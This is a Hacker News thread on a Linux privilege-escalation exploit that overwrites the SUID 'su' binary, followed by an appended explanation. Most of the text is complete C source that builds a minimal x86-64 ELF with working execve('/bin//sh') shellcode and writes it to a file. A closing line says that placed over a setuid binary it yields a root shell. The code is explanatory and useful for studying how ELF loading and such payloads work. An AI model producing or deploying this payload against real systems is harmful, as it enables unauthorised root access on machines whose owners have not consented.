Hacker News

not_your_vase, yesterday at 6:24 PM (2 replies)

Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice.


Replies

progval, yesterday at 6:34 PM

The binary "zip" isn't the exploit, it's the shellcode. The exploit is the rest, which changes the code of a SUID executable (su).

stackghost, yesterday at 8:28 PM

The call to zlib basically overwrites a portion of the `su` binary with a minimal ELF, which execve's /bin/sh.
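The "minimal ELF which execve's /bin/sh" that stackghost describes is the readable form of the binary blob not_your_vase was asking about. The following is an added example, not code from the thread or from the exploit: it builds such an image from scratch (ELF header, one executable PT_LOAD segment, then a 31-byte execve("/bin//sh") stub) and reads it back the way the kernel loader would. It assumes an x86-64 Linux target; the shellcode bytes, the 0x400000 load base and the function names are my own choices, not anything taken from the exploit.

```c
/* Added example (not the exploit's payload): a minimal static x86-64 ELF
 * whose only job is execve("/bin//sh", {"/bin//sh", NULL}, NULL).
 * Assumes Linux x86-64; bytes and layout below are my own. */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LOAD_BASE 0x400000UL   /* arbitrary page-aligned load address */

/* execve("/bin//sh", argv, NULL) via syscall 59 (0x3b); "//" pads to 8 bytes. */
static const unsigned char SHELLCODE[] = {
    0x48, 0x31, 0xf6,                                   /* xor  rsi, rsi          */
    0x56,                                               /* push rsi  (NUL term)   */
    0x48, 0xbf, '/', 'b', 'i', 'n', '/', '/', 's', 'h', /* mov  rdi, "/bin//sh"   */
    0x57,                                               /* push rdi  (the string) */
    0x54, 0x5f,                                         /* push rsp; pop rdi      */
    0x56,                                               /* push rsi  argv[1]=NULL */
    0x57,                                               /* push rdi  argv[0]      */
    0x54, 0x5e,                                         /* push rsp; pop rsi      */
    0x48, 0x31, 0xd2,                                   /* xor  rdx, rdx  (envp)  */
    0x48, 0x31, 0xc0,                                   /* xor  rax, rax          */
    0xb0, 0x3b,                                         /* mov  al, 59 (execve)   */
    0x0f, 0x05,                                         /* syscall                */
};

#define CODE_OFF   (sizeof(Elf64_Ehdr) + sizeof(Elf64_Phdr))
#define IMAGE_SIZE (CODE_OFF + sizeof(SHELLCODE))

/* Write ELF header + one PT_LOAD phdr + shellcode into out; returns bytes written. */
size_t build_minimal_elf(unsigned char *out, size_t cap)
{
    if (cap < IMAGE_SIZE) return 0;
    Elf64_Ehdr eh; Elf64_Phdr ph;
    memset(&eh, 0, sizeof eh); memset(&ph, 0, sizeof ph);

    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64; eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT; eh.e_ident[EI_OSABI] = ELFOSABI_SYSV;
    eh.e_type = ET_EXEC; eh.e_machine = EM_X86_64; eh.e_version = EV_CURRENT;
    eh.e_entry = LOAD_BASE + CODE_OFF;   /* jump straight to the shellcode */
    eh.e_phoff = sizeof eh; eh.e_ehsize = sizeof eh;
    eh.e_phentsize = sizeof ph; eh.e_phnum = 1;   /* no section headers needed */

    ph.p_type = PT_LOAD; ph.p_flags = PF_R | PF_X;
    ph.p_offset = 0; ph.p_vaddr = LOAD_BASE; ph.p_paddr = LOAD_BASE;
    ph.p_filesz = IMAGE_SIZE; ph.p_memsz = IMAGE_SIZE;   /* map the whole file */
    ph.p_align = 0x1000;

    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, &ph, sizeof ph);
    memcpy(out + CODE_OFF, SHELLCODE, sizeof SHELLCODE);
    return IMAGE_SIZE;
}

/* Read an image back like the loader: magic, class, machine, one executable
 * PT_LOAD, entry inside it, and the bytes at the entry are our execve stub.
 * Returns 1 if everything checks out, 0 otherwise. */
int check_minimal_elf(const unsigned char *buf, size_t len)
{
    if (len < CODE_OFF) return 0;
    Elf64_Ehdr eh; Elf64_Phdr ph;
    memcpy(&eh, buf, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0) return 0;
    if (eh.e_ident[EI_CLASS] != ELFCLASS64 || eh.e_machine != EM_X86_64) return 0;
    if (eh.e_phnum != 1 || eh.e_phoff + sizeof ph > len) return 0;
    memcpy(&ph, buf + eh.e_phoff, sizeof ph);
    if (ph.p_type != PT_LOAD || !(ph.p_flags & PF_X)) return 0;
    if (eh.e_entry < ph.p_vaddr || eh.e_entry >= ph.p_vaddr + ph.p_memsz) return 0;
    size_t off = (size_t)(ph.p_offset + (eh.e_entry - ph.p_vaddr));
    if (off + sizeof SHELLCODE > len) return 0;
    return memcmp(buf + off, SHELLCODE, sizeof SHELLCODE) == 0;
}

size_t minimal_elf_size(void) { return IMAGE_SIZE; }

/* Build then re-parse the image; 1 on success. */
int minimal_elf_selfcheck(void)
{
    unsigned char img[256];
    size_t n = build_minimal_elf(img, sizeof img);
    return n == IMAGE_SIZE && check_minimal_elf(img, n);
}

/* Stand-alone use: write the image to argv[1], chmod +x it, run it, get a shell. */
int main(int argc, char **argv)
{
    unsigned char img[256];
    size_t n = build_minimal_elf(img, sizeof img);
    if (argc < 2) { fprintf(stderr, "usage: %s out.elf\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "wb");
    if (!f || fwrite(img, 1, n, f) != n) { perror("write"); return 1; }
    fclose(f);
    printf("wrote %zu-byte ELF, entry 0x%lx\n", n, (unsigned long)(LOAD_BASE + CODE_OFF));
    return 0;
}
```

The whole image is 151 bytes (64-byte ELF header, 56-byte program header, 31 bytes of code), which is why such a payload fits comfortably inside the first page of a much larger SUID binary: once those bytes sit at offset 0, the kernel's loader never looks at the rest of the file. Run the built file only as an unprivileged user on a scratch box; written over a setuid binary it yields the root shell the thread is talking about.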